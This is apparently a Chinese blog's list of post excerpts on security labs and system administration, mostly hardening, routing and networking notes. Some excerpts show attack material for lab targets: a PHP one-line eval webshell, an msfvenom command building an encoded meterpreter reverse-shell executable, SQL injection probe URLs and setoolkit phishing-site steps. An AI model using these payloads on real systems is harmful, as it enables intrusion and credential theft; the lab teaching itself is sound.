m0_46317658的博客

原创 wmiexec运行错误 No module named ‘impacket.examples.utils‘

wmiexec运行错误 No module named 'impacket.examples.utils'

原创 本地文件包含详解

文件包含的概念：把可重复使用的函数写入到单个文件中，在使用该函数时，直接调用此文件，无需再次编写函数。这一调用文件的过程被称为包含。文件包含的原理：文件包含漏洞产生的原因是在通过PHP函数引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。文件包含分类文件包含分为本地文件包含和远程文件包含，而区分二者最简单的办法就是通过查看php.ini中是否开启了allow_ url_ include. 如果开启就有可能包含远程文件。远程文件包含

原创 SQL注入-基于联合查询的数字型GET注入

实验工具：phpstudy ， sqli-labs靶场，hackbar 火狐浏览器1，使用攻击机打开火狐浏览器访问靶场网站sqli-labs,进入less-2,打开hackbar进行参数调整、2，寻找注入点http://靶机ip/sqli-labs/less-2/?id-1’ 运行后报错http://靶机ip/sqli-labs/less-2/?id-1 and 1=1运行后正常显示http://靶机ip/sqli-labs/less-2/?id=1 and 1=2 运行后未正常显示

原创 SQL数据库基础操作

如果有密码的输入密码，一般为root

原创 webshell管理工具之中国蚁剑

实验环境物理机即可实验工具：中国蚁剑，phpstudy,dvwa网站一：打开phpstudy开启apache和mysql1：将dvwa网站放到www目录下2：用浏览器进行访问3：登录dvwa网站进行低等级下的文件上传4：编写一句话木马进行上传<?php @eval($_POST['password']); ?>5：打开中国蚁剑进行连接...

原创 简单的木马制作并且运用

msfvenom是msfpayload,msfencode的结合体，可利用msfvenom生成木马程序并在目标主机上执行在本地监听上线。实验环境：kali和windows7 在kali终端中进行：一： msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/h

原创 使用setoolkit制作简单钓鱼网站

setoolkit 构建钓鱼网站输入setoolkit打开框架输入1输入2输入3输入1输入本机IP输入2在本机谷歌浏览器进行访问输入email和password登录

原创 GRE隧道路由

client1ip :172.16.1.1网关：172.16.1.254server1：IP 192.168.1.1网关：192.168.1.254R1 :int g0/0/0ip add 172.16.1.254 24int g0/0/1ip add 100.100.100.1 30int Tunnel 0/0/1ip add 1.1.1.1 30Tunnel protocol gresource 100.100.100.1 (源地址)destination 200.200.2.

原创 单臂路由交换

pc1:192.168.1.1网关：192.168.1.254子网掩码：255.255.255.0pc2:192.168.1.2网关：192.168.1.254子网掩码：255.255.255.0pc3:192.168.2.1网关：192.168.2.254子网掩码：255.255.255.0pc1:192.168.2.2网关：192.168.2.254子网掩码：255.255.255.0sw1:interface Ethernet0/0/1port link-type acc.

原创 ACL过滤数据流量案例

1：由图所示步骤如下配置财务部IP为192.168.1.1子网掩码：255.255.255.0网关：192.168.1.254市场部IP为192.168.2.1子网掩码：255.255.255.0网关：192.168.2.254LSW1:vlan batch 10 20 30int e0/0/1port link-type accessport default vlan 10int vlanif 10ip address 192.168.1.254 24int e0/0/2p.

原创 简单静态路由配置

常用命令： system-view #进入系统试图 sysname #指定名称 interface # 进入接口 eg:interface g0/0/0 ip address #配置ip/网段 eg：ip address 192.168.1.2 30 display this #查看配置信息 undo #删除错误信息 display ip int

原创 Centos安全配置

一、网络配置1、检查不用的连接使用以下命令ip link show up如下图，发现有几个连接一个为lo，一个为eth033， virbr0 如果有需要关闭的接口，可以使用ip link set down2、关闭IP转发先查看ip转发配置sysctl net.ipv4.ip_forward查看发现为0，如果是1，可以使用下面命令改为0sysctl -w net.ipv4.ip_forward=03、关闭数据包重定向查看数据包重定向设置sysctl net.ipv4.conf

原创 MariaDB安全配置

一、操作系统级权限检查、1 检查数据库的运行权限，不建议以root运行数据库，防止越权攻击ps -ef | egrep “^mysql.*$”如图显示mysqld的运行用户为mysql2、禁用mariadb的历史记录功能查找缓存文件find $HOME -name “.mysql_history”将缓存文件指向空文件rm -f $HOME/.mysql_histo ryln -s /dev/null $HOME/.mysql_history3、查看并配置数据库存放路径权限登录数据

原创 apache安全配置

一实验环境一台centos 7.2服务器，已安装apache httpd,并开机自启动。实验原理通过编辑apache配置文件实现apache的安全配置，apache默认配置文件 路径 /etc/httpd/conf/httpd.conf其中第一行和第四行指明了目录，即linux的跟目录 /第二行，表示禁止使用。htaccess文件，覆盖此处配置第三行，表示禁止访问根目录二删除网站的目录浏览权限apache会在默认路径下开启目录浏览继续查看 apache的配置文件 如图，其中lid

原创 centos 7 docker镜像加速

一、如果存在旧版本需要卸载编译配置文件给他服务重启一下 **启动docker**

原创 渗透信息搜集

信息查询正向查询：域名—IPa: 使用ping命令查域名服务器IP地址eg: ping www.baidu.comb: nslookup ip查询方式eg:nslookup www.baidu.com2：反向查询 IP—域名 dig -x ip PTR后为查询的域名3 ：查询网站的域名注册信息 whois命令查询 a :whois 网站域名 / IP b :阿里云 https://whois.aliyun.com c :站长之家 h

原创 Windows主机加固

12cmd下secpol.msc打开本地安全策略打开控制面板>管理工具>本地安全策略>，在账户策略>密码策略中，确认密码必须符合复杂性要求策略已启用。打开控制面板>管理工具>本地安全策略>，在账户策略>密码策略中配置密码最长使用期限不大于90天3远程关机4在本地安全设置中，从远端系统强制关机权限只分给administators操作步骤：打开控制面板>管理工具>本地安全策略，用户权限分配中，配置从远端系统强制关机权限只分

原创 Linux主机系统加固

没有发现空口令必要时可以使用kill 加【服务】杀死进程**日志**

原创 Cookie构建再次访问对话框

原创 常见的http状态消息

200 OK 请求成功（这是对HTTP请求成功的标准应答。）301 Moved Permanently 所请求的页面已经转移至新的 URL302 Found 所请求的页面已经临时转移至新的 URL 。400 Bad Request 因为语法错误，服务器未能理解请求。401 Unauthorize

原创 http和https的区别

超文本传输协议HTTP协议被用于在Web浏览器和网站服务器之间传递信息，HTTP协议以明文方式发送内容，不提供任何方式的数据加密，如果攻击者截取了Web浏览器和网站服务器之间的传输报文，就可以直接读懂其中的信息，因此，HTTP协议不适合传输一些敏感信息，比如：信用卡号、密码等支付信息。　　为了解决HTTP协议的这一缺陷，需要使用另一种协议：安全套接字层超文本传输协议HTTPS，为了数据传输的安全，HTTPS在HTTP的基础上加入了SSL协议，SSL依靠证书来验证服务器的身份，并为浏览器和服务器之间的通信加

原创 sed命令

-ea ：新增， a 的后面可以接字串，而这些字串会在新的一行出现(目前的下一行)～c ：取代， c 的后面可以接字串，这些字串可以取代 n1,n2 之间的行！d ：删除，因为是删除啊，所以 d 后面通常不接任何咚咚；i ：插入， i 的后面可以接字串，而这些字串会在新的一行出现(目前的上一行)；...

原创 kali 更新yum源

kali linux自带的源是kali官方的，属于国外的网站，这就直接导致了我们连接非常缓慢， 更新和下载首先先查看kali中源的文件，里面默认有官方的源。 首先先查看kali中源的文件，里面默认有官方的源。 #vim /etc/apt/sources.list # kali官方源 deb http://http.kali.org/ moto main non-free contribdeb-src ht...

原创 SSH服务启动错误

1 检查网络连接状态 ping www.baidu,com 是否能ping通 2 检查ssh服务是否开启 ps -e | grep ssh 3 在确保centos 7安装了openssh -server后在终端输入 yum list installed |grep openssh-server 如果没任何输出表示没有安装openssh-server openssh-serve安装：yum install openssh-server..

原创 centos更新yum源

1、做好备份，为了更新失败时切换回去2、进入yum源配置文件夹3、根据centos版本下载对应的新源这里是centos7安装阿里的源

原创 解决VMware虚拟机无法联网问题

VMware虚拟机无法连接网络问题一 查看网络连接情况在“编辑虚拟机设置—-硬件----网络适配器”里，默认安装的虚拟机在此处的网络连接勾选的应该都是NAT 模式（若不是，推荐选择NAT 模式）， 二 点击我的电脑右键管理打开服务和应用程序，点击服务，查看vmware DHCP Service等服务是否启动三 、编辑—虚拟网络编辑器—DHCP都启动2、选中需要修改的虚拟机—点击“虚拟机”—设置—网络适配器—勾选“NAT模式”3...

原创 vmwre Authorization service无法启动

VMware Workstation Pro安装第二次时Windows无法启动 VMware Authorization server服务解决方方法一：打开我的电脑—->>管理—–>> 服务—>>下面把VMware Authorization Service 这个服务手动开启以下就行了，注意用管理员权限执行服务方法二：卸载虚拟机以及VMware注册表，注册表要卸载干净。 推荐一款软件重新安装虚拟机安装包，进行安装...